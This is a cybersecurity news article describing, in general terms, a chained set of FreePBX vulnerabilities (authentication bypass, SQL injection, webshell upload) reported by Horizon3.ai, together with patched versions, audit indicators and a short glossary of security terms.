Phantom Calls: FreePBX Flaws Let Hackers Slip Past Defenses for Full System Takeover

It started with a phone call that never happened. Behind the scenes, a silent exploit was unfolding - one that could let attackers waltz through the digital doors of FreePBX, the backbone of countless business phone systems worldwide. In a newly uncovered attack chain, researchers have revealed how cybercriminals could bypass authentication, plunder databases, and execute malicious code - all without a single legitimate credential.

Fast Facts

• Three chained vulnerabilities (CVE-2025-66039, CVE-2025-61675, CVE-2025-61678) enable unauthenticated remote code execution in FreePBX.
• The attack begins with an authentication bypass that tricks the system into accepting forged credentials.
• Once inside, attackers can perform SQL injection to steal or manipulate sensitive data.
• A file upload flaw then lets hackers implant webshells to seize full control of the server.
• Patched versions (16.0.92, 17.0.22) are available, but improper configuration may leave systems exposed.

FreePBX is the open-source VoIP management platform powering the communication lines of hospitals, law firms, and enterprises around the globe. Its popularity has made it a prime target for cybercriminals - and this latest revelation from Horizon3.ai proves just how far a determined attacker can go.

The saga unfolds with CVE-2025-66039, a flaw in the way FreePBX trusts web server authentication. By crafting fake Authorization headers, attackers can convince the system they’re legitimate users, even when they’re not. The root of the problem? FreePBX blindly accepts authentication decisions made by the Apache web server, without double-checking inside its own code. This opens the gate for unauthenticated access to sensitive endpoints.

But the attack doesn’t stop there. Once inside, CVE-2025-61675 comes into play: a suite of SQL injection bugs lurking within the Endpoint Management module. With these, intruders can read from and write to the FreePBX database - extracting confidential information or even creating new, unauthorized admin accounts. Researchers demonstrated just how easily a bad actor could exfiltrate data or set up backdoors using these flaws.

The finale is CVE-2025-61678, a vulnerability in the firmware upload system. By manipulating file paths and bypassing security checks, attackers can upload malicious PHP files (webshells) directly to directories accessible via the web - granting them the power to execute any command and seize total control of the server.

While patches have been released for affected versions, the risk remains for organizations that have configured their systems with non-standard authentication or have yet to upgrade. Security teams are urged to audit their systems for telltale signs: unauthorized database entries, suspicious cron jobs, and unfamiliar files lurking in web directories.

The FreePBX incident is a stark reminder that even trusted, open-source platforms can harbor dangerous secrets. For organizations relying on VoIP, vigilance isn’t just about patching - it's about understanding the hidden pathways hackers exploit and staying a step ahead in the ever-evolving cybersecurity landscape.

WIKICROOK

• VoIP: VoIP lets users make phone calls via the internet, offering cost savings and flexibility, but also introduces unique cybersecurity risks.
• Authentication Bypass: Authentication bypass is a vulnerability that lets attackers skip or trick the login process, gaining access to systems without valid credentials.
• SQL Injection: SQL Injection is a hacking technique where attackers insert malicious code into user inputs to trick a database into executing harmful commands.
• Webshell: A webshell is a hidden program uploaded by hackers to a compromised website, giving them remote control and unauthorized access like a secret backdoor.
• Endpoint: An endpoint is any device, such as a computer or smartphone, that connects to a network and must be kept secure and updated to prevent cyber threats.